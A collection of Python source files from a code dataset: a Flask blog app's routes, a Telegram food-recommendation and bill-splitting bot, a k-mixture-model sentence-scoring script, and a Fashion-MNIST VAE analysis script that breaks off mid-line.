+{"seq_id":"548297408","text":"from flask import render_template, flash, redirect, url_for, request\r\nfrom app import app, db\r\nfrom app.models import User, Post\r\nfrom .forms import LoginForm, RegisterForm, EditProfileForm, CreatePostForm\r\nfrom flask_login import login_required, login_user, logout_user, current_user\r\nimport datetime\r\nimport time\r\nimport pytz\r\nimport feedparser\r\n\r\nCARDS_PER_PAGE = 5\r\n\r\n\r\n@app.before_request\r\ndef before_request():\r\n if current_user.is_authenticated:\r\n current_user.last_seen = datetime.datetime.utcnow()\r\n db.session.commit()\r\n\r\n\r\n# Root URL\r\n# Redirects to /login, /admin, or /blog\r\n@app.route('/')\r\n@app.route('/index')\r\ndef index():\r\n if current_user.is_authenticated:\r\n if current_user.username == 'admin':\r\n return redirect(url_for('admin'))\r\n else:\r\n return redirect(url_for('blog'))\r\n\r\n return redirect(url_for('login'))\r\n\r\n\r\n# Authorization\r\n# Sign in to an account or go to registration\r\n@app.route('/login', methods=['GET', 'POST'])\r\ndef login():\r\n if current_user.is_authenticated:\r\n if current_user.username == 'admin':\r\n return redirect(url_for('admin'))\r\n else:\r\n return redirect(url_for('blog'))\r\n\r\n form = LoginForm()\r\n if form.validate_on_submit():\r\n user = User.query.filter_by(username=form.username.data).first()\r\n if user is None or not user.check_password(form.password.data):\r\n flash('Invalid username or password')\r\n return redirect(url_for('login'))\r\n\r\n login_user(user, remember=form.remember_me.data)\r\n\r\n if user.username == 'admin':\r\n return redirect(url_for('admin'))\r\n else:\r\n return redirect(url_for('blog'))\r\n\r\n return render_template('login.html',\r\n title='Sign in',\r\n form=form)\r\n\r\n\r\n# Sign out of the account\r\n# Logs out and redirects to the login page\r\n@app.route('/logout/')\r\ndef logout():\r\n logout_user()\r\n flash(\"You have been signed out.\")\r\n return redirect(url_for('login'))\r\n\r\n\r\n# Registration\r\n# Registration form with a redirect to the login page\r\n# You can only register as a regular user\r\n@app.route('/register', methods=['GET', 'POST'])\r\ndef register():\r\n if current_user.is_authenticated:\r\n return redirect(url_for('index'))\r\n\r\n form = RegisterForm()\r\n\r\n if form.validate_on_submit():\r\n user = User(username=form.username.data)\r\n\r\n user.set_password(form.password.data)\r\n\r\n db.session.add(user)\r\n db.session.commit()\r\n\r\n flash('You are registered! You can sign in now.')\r\n return redirect(url_for('login'))\r\n\r\n return render_template('register.html',\r\n title='Registration',\r\n form=form)\r\n\r\n\r\n# Information about any user\r\n@app.route('/user/<username>')\r\n@login_required\r\ndef user(username):\r\n user = User.query.filter_by(username=username).first_or_404()\r\n utc = pytz.timezone('UTC')\r\n msk = pytz.timezone('Europe/Moscow')\r\n user.last_seen = utc.localize(user.last_seen).astimezone(msk).strftime(\"%d-%m-%Y %H:%M\")\r\n\r\n return render_template('user.html', user=user)\r\n\r\n\r\n# Profile editing (for the owner or an admin)\r\n@app.route('/edit-profile', methods=['GET', 'POST'])\r\ndef edit_profile():\r\n profile_id = request.args.get(\"id\", current_user.id, type=int)\r\n\r\n if current_user.id != profile_id and current_user.username != 'admin':\r\n return redirect(url_for('edit_profile', id=current_user.id))\r\n\r\n u = User.query.filter(User.id == profile_id).first()\r\n\r\n form = EditProfileForm()\r\n if form.validate_on_submit():\r\n u.username = form.username.data\r\n u.about_me = form.about_me.data\r\n\r\n if form.password.data != '':\r\n u.set_password(form.password.data)\r\n\r\n db.session.commit()\r\n\r\n flash('Your changes have been saved!')\r\n return redirect(url_for('edit_profile', id=profile_id))\r\n elif request.method == 'GET':\r\n form.username.data = u.username\r\n form.password.data = ''\r\n form.about_me.data = u.about_me\r\n\r\n return render_template(\"edit-profile.html\",\r\n title='Edit profile',\r\n user=u,\r\n form=form)\r\n\r\n\r\n# Admin panel (admins only)\r\n# Allows viewing user info and deleting profiles\r\n@login_required\r\n@app.route('/admin')\r\ndef admin():\r\n if current_user.username != 'admin':\r\n return redirect(url_for('blog'))\r\n\r\n delete_id = request.args.get('delete', -1, type=int)\r\n if delete_id > -1:\r\n u = User.query.filter(User.id == delete_id).first()\r\n\r\n for t in u.posts.all():\r\n db.session.delete(t)\r\n\r\n db.session.delete(u)\r\n db.session.commit()\r\n\r\n flash('User deleted!')\r\n return redirect(url_for('admin'))\r\n\r\n users_list = User.query.all()\r\n\r\n return render_template('admin.html',\r\n title='Admin panel',\r\n user=current_user,\r\n users_list=users_list)\r\n\r\n\r\n# List of posts with a delete button for the admin\r\n@login_required\r\n@app.route('/manage')\r\ndef manage():\r\n if current_user.username != 'admin':\r\n return redirect(url_for('blog'))\r\n\r\n delete_id = request.args.get('delete', -1, type=int)\r\n if delete_id > -1:\r\n p = Post.query.filter(Post.id == delete_id).first()\r\n\r\n db.session.delete(p)\r\n db.session.commit()\r\n\r\n flash('Post deleted!')\r\n return redirect(url_for('manage'))\r\n\r\n posts = Post.query.all()\r\n\r\n return render_template('manage.html',\r\n title='Admin panel',\r\n user=current_user,\r\n posts=posts)\r\n\r\n\r\n# Write a new post\r\n@login_required\r\n@app.route('/create', methods=['GET', 'POST'])\r\ndef create_post():\r\n form = CreatePostForm()\r\n if form.validate_on_submit():\r\n post = Post(headline=form.headline.data,\r\n text=form.text.data,\r\n author=current_user\r\n )\r\n\r\n db.session.add(post)\r\n db.session.commit()\r\n\r\n flash('The post has been added to the main page!')\r\n return redirect(url_for('blog'))\r\n\r\n return render_template(\"create.html\",\r\n title='Add a post',\r\n user=current_user,\r\n form=form)\r\n\r\n\r\n# Page of user posts with pagination\r\n@login_required\r\n@app.route('/blog')\r\ndef blog():\r\n page = request.args.get('page', 1, type=int)\r\n posts = Post.query.order_by(Post.timestamp.desc()).paginate(page, CARDS_PER_PAGE, False)\r\n\r\n next_url = url_for('blog', page=posts.next_num) \\\r\n if posts.has_next else None\r\n prev_url = url_for('blog', page=posts.prev_num) \\\r\n if posts.has_prev else None\r\n\r\n for p in posts.items:\r\n utc = pytz.timezone('UTC')\r\n msk = pytz.timezone('Europe/Moscow')\r\n p.time = utc.localize(p.timestamp).astimezone(msk)\r\n p.time = p.time.strftime(\"%d-%m-%Y %H:%M\")\r\n\r\n return render_template('blog.html',\r\n title='Blog',\r\n user=current_user,\r\n posts=posts.items,\r\n next_url = next_url,\r\n prev_url = prev_url\r\n )\r\n\r\n\r\n# News page\r\n@login_required\r\n@app.route('/news')\r\ndef news():\r\n page = request.args.get('page', 1, type=int)\r\n d = feedparser.parse('https://republic.ru/export/all.xml')\r\n\r\n next_url = url_for('news', page=page + 1)\r\n prev_url = url_for('news', page=page - 1) \\\r\n if page > 1 else None\r\n\r\n news_items = d.entries[((page - 1) * CARDS_PER_PAGE):(page * CARDS_PER_PAGE)]\r\n for n in news_items:\r\n t = datetime.datetime.fromtimestamp(time.mktime(n.published_parsed))\r\n utc = pytz.timezone('UTC')\r\n msk = pytz.timezone('Europe/Moscow')\r\n t = utc.localize(t).astimezone(msk)\r\n\r\n n.time = t.strftime(\"%d-%m-%Y %H:%M (MSK)\")\r\n\r\n return render_template('news.html',\r\n title='News',\r\n user=current_user,\r\n news = news_items,\r\n next_url=next_url,\r\n prev_url=prev_url\r\n )\r\n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":9165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
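The routes.py record above repeatedly converts naive UTC timestamps to Moscow time with pytz. A standalone sketch of that idiom, outside any Flask context (the example datetime is arbitrary):

    import datetime
    import pytz

    utc = pytz.timezone('UTC')
    msk = pytz.timezone('Europe/Moscow')
    naive_utc = datetime.datetime(2021, 1, 1, 12, 0)
    # localize() attaches the UTC zone to the naive value; astimezone() then
    # shifts it to Moscow time (UTC+3 year-round, so 12:00 UTC -> 15:00 MSK).
    print(utc.localize(naive_utc).astimezone(msk).strftime("%d-%m-%Y %H:%M"))  # 01-01-2021 15:00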
+{"seq_id":"128495655","text":"import telebot\nfrom telebot import types\n\nimport logging\nimport os\n\nimport telegram\nfrom telegram import Update, ForceReply, Message\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters, CallbackContext\n\nimport decimal\nimport random\n\nTOKEN = \"\"\n\nbot = telebot.TeleBot(TOKEN)\nuser = bot.get_me()\n\n# Enable logging\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\nPORT = int(os.environ.get('PORT', '8443'))\n\n# Define command handlers\ndef start(update, context):\n #select options\n reply_keyboard = [['Food recommendation \\U0001F924', 'Split my bills \\U0001F4B8']]\n update.message.reply_text(\"Hello, what would you like to do today?\", reply_markup = telegram.ReplyKeyboardMarkup(reply_keyboard,\n resize_keyboard = True,\n one_time_keyboard = True))\n\ndef back(update, context):\n options = [['Location', 'Cuisine']]\n update.message.reply_text(\"Looking for something to eat? Use the buttons below to filter by location or cuisine!\", reply_markup = telegram.ReplyKeyboardMarkup(options,\n resize_keyboard = True,\n one_time_keyboard = True))\n\ndef get_recommendation(update, context):\n options = [['Location', 'Cuisine']]\n update.message.reply_text(\"Looking for something to eat? Use the buttons below to filter by location or cuisine!\", reply_markup = telegram.ReplyKeyboardMarkup(options,\n resize_keyboard = True,\n one_time_keyboard = True))\n \ndef get_location(update, context):\n options = [['1. North', '2. Northeast', '3. East'], ['4. West', '5. Central', '/back']]\n update.message.reply_text(\"Please select your region or enter your postal code below! 
\\U0001F60B \\n\\nEg: /postalcode 123456\", reply_markup = telegram.ReplyKeyboardMarkup(options, resize_keyboard = True))\n\n #options = [['Region', 'Postal Code (to be updated)']]\n #update.message.reply_text(\"Please select your region or enter your postal code!\", reply_markup = telegram.ReplyKeyboardMarkup(options,\n #resize_keyboard = True,\n #one_time_keyboard = True)) \ndef get_postalcd(update, context):\n update.message.reply_text(\"Enter your postal code below! \\U0001F60B \\nEg: /postalcode 123456\")\n\ndef postalcode(update, context):\n userinput = update.message.text.split(\" \")\n pc = userinput[1]\n places = open('everything.txt').read()\n para = places.split('\\n\\n')\n random.shuffle(para)\n output = []\n for i in para:\n before, key, after = i.partition('Singapore')\n if after[1:3] == pc[0:2] :\n output.append(i + \"\\n\\n\")\n\n if len(output) > 5:\n final = output[0:5]\n else:\n final = output\n\n str1 = ''\n \n result = ''\n if len(pc) != 6:\n result = \"Invalid postal code entered! Please try again.\"\n elif len(final) == 0:\n result = \"No recommendations at the moment! We will work to expand our database.\"\n else:\n result = \"Here are some food places near you! \\U0001F929 \\n\\n\" + str1.join(final)\n \n update.message.reply_text(result, parse_mode = 'HTML', disable_web_page_preview = True)\n \n\ndef food_near_pc(update, context):\n update.message.reply_text('to be updated')\n ##TODO\n\ndef get_region(update, context):\n options = [['1. North', '2. Northeast', '3. East'], ['4. West', '5. Central', '/back']]\n update.message.reply_text(\"Where are you now? \\U0001F914\", reply_markup = telegram.ReplyKeyboardMarkup(options, resize_keyboard = True))\n\ndef get_cuisine(update, context):\n options = [['Chinese', 'Malay', 'Indian'], ['Western', 'Thai', 'Others']]\n update.message.reply_text(\"Select what you're craving for!\", reply_markup = telegram.ReplyKeyboardMarkup(options, \n resize_keyboard = True))\n \ndef random_shuffle(fname):\n lines = open(fname).read()\n paragraphs = lines.split('\\n\\n')\n random.shuffle(paragraphs)\n i = 0\n output = \"\"\n while i < 3:\n output = output + paragraphs[i] + \"\\n\\n\"\n i = i + 1\n return output\n\ndef get_north(update, context):\n #file = open('north.txt')\n north_food = random_shuffle('north.txt')\n update.message.reply_text('List of food recommendations in the North! \\n\\n' + north_food + \"Press again for more!\",\n parse_mode = 'HTML',\n disable_web_page_preview = True)\n\ndef get_northeast(update, context):\n #file = open('northeast.txt')\n northeast_food = random_shuffle('northeast.txt')\n update.message.reply_text('List of food recommendations in the Northeast! \\n\\n' + northeast_food + \"Press again for more!\",\n parse_mode = 'HTML',\n disable_web_page_preview = True)\n\ndef get_east(update, context):\n #file = open('east.txt')\n east_food = random_shuffle('east.txt')\n update.message.reply_text('List of food recommendations in the East! \\n\\n' + east_food + \"Press again for more!\",\n parse_mode = 'HTML',\n disable_web_page_preview = True)\n\ndef get_west(update, context):\n #file = open('west.txt')\n west_food = random_shuffle('west.txt')\n update.message.reply_text('List of food recommendations in the West! \\n\\n' + west_food + \"Press again for more!\",\n parse_mode = 'HTML',\n disable_web_page_preview = True)\n\ndef get_central(update, context):\n #file = open('central.txt')\n central_food = random_shuffle('central.txt')\n update.message.reply_text('List of food recommendations in Central! 
\\n\\n' + central_food + \"Press again for more!\",\n parse_mode = 'HTML',\n disable_web_page_preview = True)\n \ndef filter_cuisine(fname, input_text):\n lines = open(fname).read()\n paragraphs = lines.split('\\n\\n')\n random.shuffle(paragraphs)\n filtered = \"\"\n for p in paragraphs:\n if input_text in p:\n filtered += p + \"\\n\\n\"\n filtered_1 = filtered[0:-4]\n new_file = filtered_1.split('\\n\\n')\n random.shuffle(new_file)\n i = 0\n output = \"\"\n while i < 3:\n output = output + new_file[i] + \"\\n\\n\"\n i = i + 1\n return output \n \ndef get_chinese(update, context):\n input_text = \"Chinese\"\n chinese_food = filter_cuisine('everything.txt', input_text)\n update.message.reply_text('Here are some Chinese food recommendations! \\n\\n' + chinese_food + \"Press again for more!\",\n parse_mode = 'HTML',\n disable_web_page_preview = True)\n \ndef get_malay(update, context):\n input_text = \"Malay\"\n malay_food = filter_cuisine('everything.txt', input_text)\n update.message.reply_text('Here are some Malay food recommendations! \\n\\n' + malay_food + \"Press again for more!\",\n parse_mode = 'HTML',\n disable_web_page_preview = True)\n \ndef get_indian(update, context):\n input_text = \"Indian\"\n indian_food = filter_cuisine('everything.txt', input_text)\n update.message.reply_text('Here are some Indian food recommendations! \\n\\n' + indian_food + \"Press again for more!\",\n parse_mode = 'HTML',\n disable_web_page_preview = True)\n \ndef get_western(update, context):\n input_text = \"Western\"\n western_food = filter_cuisine('everything.txt', input_text)\n update.message.reply_text('Here are some Western food recommendations! \\n\\n' + western_food + \"Press again for more!\",\n parse_mode = 'HTML',\n disable_web_page_preview = True)\n \ndef get_thai(update, context):\n input_text = \"Thai\"\n thai_food = filter_cuisine('everything.txt', input_text)\n update.message.reply_text('Here are some Thai food recommendations! \\n\\n' + thai_food + \"Press again for more!\",\n parse_mode = 'HTML',\n disable_web_page_preview = True)\n \ndef get_others(update, context):\n other_food = random_shuffle('others.txt')\n update.message.reply_text('Here are some more food recommendations! \\n\\n' + other_food + \"Press again for more!\",\n parse_mode = 'HTML',\n disable_web_page_preview = True)\n\ndef split_bills(update, context):\n update.message.reply_text(\"Please enter each person and their amount paid in the following format:\" +\n \"\\n /calculate Name Amount Name Amount\" + \n \"\\n\\n E.G. /calculate james 1.20 jason 5.80 jess 0\") \n \n# Calculate Bill\ndef calculate(update: Update, _: CallbackContext) -> None:\n \"\"\"Splits the bill\"\"\"\n all_words = update.message.text.split(\" \")\n #all_words = [\"/calculate\", \"Name\", \"Amt\", \"Name\"] //in strings\n\n #converting to list of integers\n terms = list(all_words[1:])\n names = []\n amounts = []\n i = 0\n while i < len(terms):\n if i % 2 == 0:\n names.append(terms[i])\n i = i + 1\n else:\n try:\n amounts.append(decimal.Decimal(terms[i]))\n i = i + 1\n except decimal.InvalidOperation:\n amounts = \"Error! 
Invalid expression entered, please check and ensure names doesn't have spacings and amounts don't include $.\"\n break\n \n if type(amounts) is not str:\n # total amount to pay\n total = sum(amounts)\n\n # amount per person\n decimal.getcontext().prec = 3\n ave_amt = decimal.Decimal(total / len(names))\n\n # amount to pay/receive\n diffs = [ave_amt - amnt for amnt in amounts]\n \n to_pay = \"\"\n index = 0\n while index < len(names):\n if diffs[index] > 0:\n to_pay = to_pay + (\"\\n\" + names[index] + \" should pay $\" + str(diffs[index]))\n index += 1\n elif diffs[index] == 0:\n to_pay = to_pay + (\"\\n\" + names[index] + \" does not have to pay\")\n index += 1\n else:\n to_pay = to_pay + (\"\\n\" + names[index] + \" should receive $\" + str(diffs[index]*(-1)))\n index += 1\n \n #return response\n update.message.reply_text(f\"{to_pay}\")\n else:\n update.message.reply_text(f\"{amounts}\")\n \ndef main() -> None:\n \"\"\"Start the bot.\"\"\"\n # Create the Updater and pass it your bot's token.\n updater = Updater(TOKEN)\n\n # Get the dispatcher to register handlers\n dispatcher = updater.dispatcher\n\n # on different commands - answer in Telegram\n dispatcher.add_handler(CommandHandler(\"start\", start))\n dispatcher.add_handler(CommandHandler(\"back\", back))\n dispatcher.add_handler(CommandHandler(\"postal_code\", get_postalcd))\n dispatcher.add_handler(CommandHandler(\"postalcode\", postalcode))\n dispatcher.add_handler(CommandHandler(\"region\", get_region))\n dispatcher.add_handler(CommandHandler(\"cuisine\", get_cuisine))\n dispatcher.add_handler(CommandHandler(\"split_bills\", split_bills))\n dispatcher.add_handler(CommandHandler(\"calculate\", calculate))\n\n # on non command i.e message - echo the message on Telegram\n dispatcher.add_handler(MessageHandler(Filters.regex('Food recommendation \\U0001F924'), get_recommendation))\n dispatcher.add_handler(MessageHandler(Filters.regex('Split my bills \\U0001F4B8'), split_bills))\n dispatcher.add_handler(MessageHandler(Filters.regex('Postal Code'), get_postalcd))\n dispatcher.add_handler(MessageHandler(Filters.regex('Region'), get_region))\n dispatcher.add_handler(MessageHandler(Filters.regex('1. North'), get_north))\n dispatcher.add_handler(MessageHandler(Filters.regex('2. Northeast'), get_northeast))\n dispatcher.add_handler(MessageHandler(Filters.regex('3. East'), get_east))\n dispatcher.add_handler(MessageHandler(Filters.regex('4. West'), get_west))\n dispatcher.add_handler(MessageHandler(Filters.regex('5. 
Central'), get_central))\n dispatcher.add_handler(MessageHandler(Filters.regex('Location'), get_location))\n dispatcher.add_handler(MessageHandler(Filters.regex('Cuisine'), get_cuisine))\n dispatcher.add_handler(MessageHandler(Filters.regex('Chinese'), get_chinese))\n dispatcher.add_handler(MessageHandler(Filters.regex('Malay'), get_malay))\n dispatcher.add_handler(MessageHandler(Filters.regex('Indian'), get_indian))\n dispatcher.add_handler(MessageHandler(Filters.regex('Western'), get_western))\n dispatcher.add_handler(MessageHandler(Filters.regex('Thai'), get_thai))\n dispatcher.add_handler(MessageHandler(Filters.regex('Others'), get_others))\n \n # Start the Bot\n updater.start_polling()\n## updater.start_webhook(listen=\"0.0.0.0\",\n## port=int(PORT),\n## url_path=TOKEN,\n## webhook_url='https://foodiefriendsbot.herokuapp.com/' + TOKEN)\n## updater.bot.set_webhook(url=settings.WEBHOOK_URL)\n## updater.bot.set_webhook(\"foodiefriendsbot\" + TOKEN)\n\n # Run the bot until you press Ctrl-C or the process receives SIGINT,\n # SIGTERM or SIGABRT. This should be used most of the time, since\n # start_polling() is non-blocking and will stop the bot gracefully.\n updater.idle()\n\nif __name__ == '__main__':\n main()\n","sub_path":"milestone3/foodiefriends.py","file_name":"foodiefriends.py","file_ext":"py","file_size_in_byte":14464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"553363674","text":"import sys\nimport os\nimport math\nimport html2text\nimport operator\nimport itertools\nimport operator\nfrom nltk import tokenize\nfrom nltk.corpus import stopwords, wordnet as wn\nimport crf_test\n# \n# python k-mix-model.py unannotated-text.txt\n# Pg 139 / 207 in thesis\n#\n\nKMM_TRAIN_FOLDER = '../kmix_train'\n# KMM_TRAIN_FOLDER = '../FullText_html/'\n\nstopword_set = set(stopwords.words('english'))\nstopword_set.add('[')\n\ndef extractorData(html):\n\t# dummy list\n\tstart = 0\n\ttokenized= tokenizeSentence(html)\n\t# The Judgment was delivered by / 'for educational use only'\n\twhile 'the judgment was delivered by' not in tokenized[start].lower() \\\n\t\tand 'for educational use only' not in tokenized[start].lower():\n\t\tstart = start + 1\n\tans=[]\n\tfor i in range(start+1, len(tokenized)):\n\t\tif 'thomson reuters' in tokenized[i]:\n\t\t\tbreak\n\t\tans.append(tokenized[i])\n\treturn ans\n\n\ndef accumulate(l):\n\t'''\n\t\tGroup By Key\n\t'''\n\tit = itertools.groupby(l, operator.itemgetter(0))\n\tfor key, subiter in it:\n\t\tyield key, sum(item[1] for item in subiter)\n\n\ndef find_nth(haystack, needle, n):\n\tstart = haystack.find(needle)\n\twhile start >= 0 and n > 1:\n\t\tstart = haystack.find(needle, start+len(needle))\n\t\tn -= 1\n\treturn start\n\n# Don't process tags, just strip them out. 
Use an indent of 4 spaces \n# and a page that's 80 characters wide.\n\n# 1st Tokenize and form sentence\ndef tokenizeSentence(fileContent):\n \"\"\"\n :param fileContent: fileContent is the file content which needs to be summarized\n :return: Returns a list of string(sentences)\n \"\"\"\n return tokenize.sent_tokenize(fileContent)\n\n\n# 2nd Case Folding\ndef caseFolding(line):\n \"\"\"\n :param line is the input on which case folding needs to be done\n :return: Line with all characters in lower case\n \"\"\"\n return line.lower()\n\n\n# 3rd Tokenize and form tokens from sentence\ndef tokenizeLine(sentence):\n \"\"\"\n :param sentence: Sentence is the english sentence of the file\n :return: List of tokens\n \"\"\"\n return tokenize.word_tokenize(sentence)\n\n\n# 4th Stop Word Removal\ndef stopWordRemove(tokens):\n \"\"\"\n :param tokens: List of Tokens\n :return: List of tokens after removing stop words\n \"\"\"\n list_tokens = []\n for token in tokens:\n if (token not in stopword_set) and (token != '.') and (token != ','):\n list_tokens.append(token)\n return list_tokens\n\ndef KMM(eval_file):\n\n\ttraining = os.listdir(KMM_TRAIN_FOLDER)\n\tlistOfData=[]\n\tmaxof=0\n\tnameof=None\n\n\tfor file in training:\n\t\twith open('./'+KMM_TRAIN_FOLDER+'/'+file, 'r') as f:\n\t\t\ttxt = f.read()\n\n\t\ttxt=(txt.replace('\\\"\\']|\\\"[^\\\"]*\\\"|\\'[^\\']*\\')*>',''))\n\t\tif(len(txt)>maxof):\n\t\t\tmaxof=len(txt)\n\t\t\tnameof=file\n\n\t\tconverted_text = html2text.html2text(txt)\n\t\tlistOfData.append(caseFolding(converted_text))\n\n\t# print(nameof, '\\n', maxof)\n\n\twith open(eval_file, 'r') as f:\n\t\tmysentences = f.readlines()\n\t# mysentences, _ = crf_test.parse_html(eval_file)\n\n\tmysentences_id=None\n\tidx=1\n\n\tt2 = [caseFolding(sentence) for sentence in mysentences]\n\tmysentences = t2\n\n\tindex={}\n\tlistOfSentences=[]\n\tdocId=1\n\tstartReading=False\n\n\n\tfor file in listOfData:\n\t\tsentences = extractorData(file)\n\t\t\n\t\tfor sentence in sentences:\n\t\t\tsentence=sentence.strip()\n\t\t\tif len(sentence)==0:\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\ttokens=tokenizeLine(sentence)\n\t\t\t\tfinal_tokens=stopWordRemove(tokens)\n\t\t\t\tfor token in final_tokens:\n\t\t\t\t\tif token not in index:\n\t\t\t\t\t\tindex[token]= []\n\n\t\t\t\t\tindex[token].append( (docId, 1) )\n\t\tdocId=docId+1\n\t\n\tfor key in index:\n\t\tgetList=index[key]\n\t\tindex[key]=list(accumulate(getList))\n\t\tif len(getList) > 2:\n\t\t\tprint(key, '=>', index[key])\n\t\t\tprint(index[key])\n\n\tprint(len(index))\n\tN, cf, tf, df = 360, 0, 0, 0\n\tnum= math.log(N)/math.log(2)\n\tkmixresult={}\n\tsent_id=1\n\n\tfor sentence in mysentences:\n\t\tpk=0\n\t\tmyline=tokenizeLine(sentence)\n\t\tfinal_tokens=stopWordRemove(myline)\n\n\t\tfor token in final_tokens:\n\t\t\tif token not in index:\n\t\t\t\tcontinue\n\t\t\tmylist=index[token]\n\t\t\tcf=0\t\t\n\t\t\tfor x,y in mylist:\n\t\t\t\tif x==1:\n\t\t\t\t\ttf=y\n\t\t\t\t\tdf=len(mylist)\n\t\t\t\t\t\n\t\t\t\tcf=cf+y\n\t\t\t#print 'token='+token\n\t\t\tt= cf*1.0/N\n\t\t\t#print 't='+str(t)\n\t\t\tidf = num*1.0/df if df else 0\n\t\t\t#print 'idf='+str(idf)\n\t\t\ts = (((cf-df)*1.0)/df) if df else 0\n\t\t\t#print 's='+str(s)\n\t\t\tr=1\n\t\t\tr = t/s if s else 0\n\t\t\t#print 'r='+str(r)\n\t\t\tpk = (r / (s+1) ) * (s / (s+1) ) + math.pow( (s / (s+1) ), tf)\n\n\t\t#print sentence\n\t\t#print pk\n\t\tkmixresult[sent_id] = pk\n\t\tsent_id = sent_id + 1\n\t\t# print(sentence, kmixresult[sent_id-1])\n\n\t# for sentence in mysentences:\n\t# \tprint(sentence)\n\n\t# 
print(len(mysentences))\n\t# print(kmixresult)\n\t\n\t# sorted_d = sorted(kmixresult.items(), key=operator.itemgetter(1),reverse=True)\n\treturn kmixresult\n\t# oFile = open('k_mix_output.txt', 'w')\n\t# for key,value in sorted_d:\n\t# \toFile.write(str(key)+'\\t'+str(value)+'\\n')\n\t# oFile.close()\n\n\nif __name__ == '__main__':\n\tif(len(sys.argv) < 2) :\n\t\tprint('Need to provide file to evaluate!')\n\t\texit(0)\n\t\n\tKMM(sys.argv[1])","sub_path":"supervised/k_mix_model_oneoff.py","file_name":"k_mix_model_oneoff.py","file_ext":"py","file_size_in_byte":4939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"186196776","text":"#%%\nfrom __future__ import division\nimport numpy as np\nimport torch\nimport matplotlib.pyplot as plt\n\nfrom util import *\nfrom load_mnist import *\nfrom mnist_test_fnc import sweepLatentFactors\n\n# --- parameters ---\n# classes 0,3,4\ny_dim = 3\nz_dim = 6\nalpha_dim = 2\nc_dim = 1\nimg_size = 28\nclass_use = np.array([0,3,4])\ni0 = 1 # class 0 = t-shirt/top\ni3 = 3 # class 3 = dress\ni4 = 0 # class 4 = coat\nlatent_sweep_vals = np.linspace(-2,2,25)\nlatent_sweep_plot = [0,4,8,12,16,20,24]\nclassifier_file = 'pretrained_models/fmnist_034_classifier/model.pt'\nvae_file = 'pretrained_models/fmnist_034_vae_zdim6_alphadim2_lambda0.05/model.pt'\n\n# --- initialize ---\nclass_use_str = np.array2string(class_use) \ny_dim = class_use.shape[0]\nnewClass = range(0,y_dim)\nnsweep = len(latent_sweep_vals)\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nparams = {'z_dim' : z_dim,\n 'alpha_dim' : alpha_dim,\n 'No' : 100,\n 'Ni' : 25,\n 'decoder_net' : 'VAE_CNN',\n 'break_up_ce' : False}\n\n#%% --- load test data ---\nX, Y, tridx = load_fashion_mnist_classSelect('train',class_use,newClass)\nvaX, vaY, vaidx = load_fashion_mnist_classSelect('val',class_use,newClass)\nntrain = X.shape[0]\n\n#%% --- load VAE ---\nfrom models.CVAE import Decoder, Encoder\ncheckpoint_vae = torch.load(vae_file, map_location=device)\nencoder = Encoder(z_dim,c_dim,img_size**2).to(device)\ndecoder = Decoder(z_dim,c_dim,img_size**2).to(device)\nencoder.load_state_dict(checkpoint_vae['model_state_dict_encoder'])\ndecoder.load_state_dict(checkpoint_vae['model_state_dict_decoder'])\n\n#%% --- load classifier ---\nfrom models.CNN_classifier import CNN\ncheckpoint_model = torch.load(classifier_file, map_location=device)\nclassifier = CNN(y_dim).to(device)\nclassifier.load_state_dict(checkpoint_model['model_state_dict_classifier'])\n\n#%% --- encode example points to latent space ---\nx0_torch = torch.from_numpy(np.expand_dims(vaX[i0],0)).permute(0,3,1,2).float().to(device)\nx3_torch = torch.from_numpy(np.expand_dims(vaX[i3],0)).permute(0,3,1,2).float().to(device)\nx4_torch = torch.from_numpy(np.expand_dims(vaX[i4],0)).permute(0,3,1,2).float().to(device)\nlatent_x0 = encoder(x0_torch)[0].cpu().detach().numpy()\nlatent_x3 = encoder(x3_torch)[0].cpu().detach().numpy()\nlatent_x4 = encoder(x4_torch)[0].cpu().detach().numpy()\ndecoded_x0 = decoder(torch.unsqueeze(torch.from_numpy(latent_x0),0).float().to(device)).cpu().detach().numpy().squeeze()\ndecoded_x3 = decoder(torch.unsqueeze(torch.from_numpy(latent_x3),0).float().to(device)).cpu().detach().numpy().squeeze()\ndecoded_x4 = decoder(torch.unsqueeze(torch.from_numpy(latent_x4),0).float().to(device)).cpu().detach().numpy().squeeze()\nprint('Latent representation of sample 0 (validation set index %d): %s' % (i0, str(latent_x0)))\nprint('Latent representation of sample 3 (validation 
set index %d): %s' % (i3, str(latent_x3)))\nprint('Latent representation of sample 4 (validation set index %d): %s' % (i4, str(latent_x4)))\n\n#%% --- generate images from latent sweep ---\nlatent_sweep = np.zeros((z_dim, nsweep, img_size, img_size))\nfor ilatent in range(z_dim):\n for (isweep, v) in enumerate(latent_sweep_vals):\n latent_vec = np.zeros((z_dim))\n latent_vec[ilatent] = v\n latent_vec_torch = torch.unsqueeze(torch.from_numpy(latent_vec),0).float().to(device)\n latent_sweep[ilatent,isweep,:,:] = decoder(latent_vec_torch).cpu().detach().numpy()\n \n#%% --- plot latent sweep ---\nfig, axs = plt.subplots(z_dim, len(latent_sweep_plot))\nfor ilatent in range(z_dim):\n for (isweep, sweep_idx) in enumerate(latent_sweep_plot):\n img = 1.-latent_sweep[ilatent,sweep_idx,:,:].squeeze()\n axs[ilatent,isweep].imshow(img, cmap='gray', interpolation='nearest')\n axs[ilatent,isweep].set_xticks([])\n axs[ilatent,isweep].set_yticks([])\nprint('columns correspond to latent values %s' % str(latent_sweep_vals[latent_sweep_plot]))\nplt.savefig('./figs/fig_fmnist_quant_latentsweep.svg', bbox_inches=0)\n\n\n#%% --- compute information flow ---\nfrom informationFlow import information_flow_singledim\ninfo_flow = np.zeros((z_dim))\nfor i in range(z_dim):\n print('Computing information flow for latent dimension %d/%d...' % (i+1,z_dim))\n info_flow[i] = information_flow_singledim(i, params, decoder, classifier, device)\n\n# --- plot information flow ---\ncols = {'golden_poppy' : [1.000,0.761,0.039],\n 'bright_navy_blue' : [0.047,0.482,0.863],\n 'rosso_corsa' : [0.816,0.000,0.000]}\nx_labels = ('$\\\\alpha_1$', '$\\\\alpha_2$', '$\\\\beta_1$', 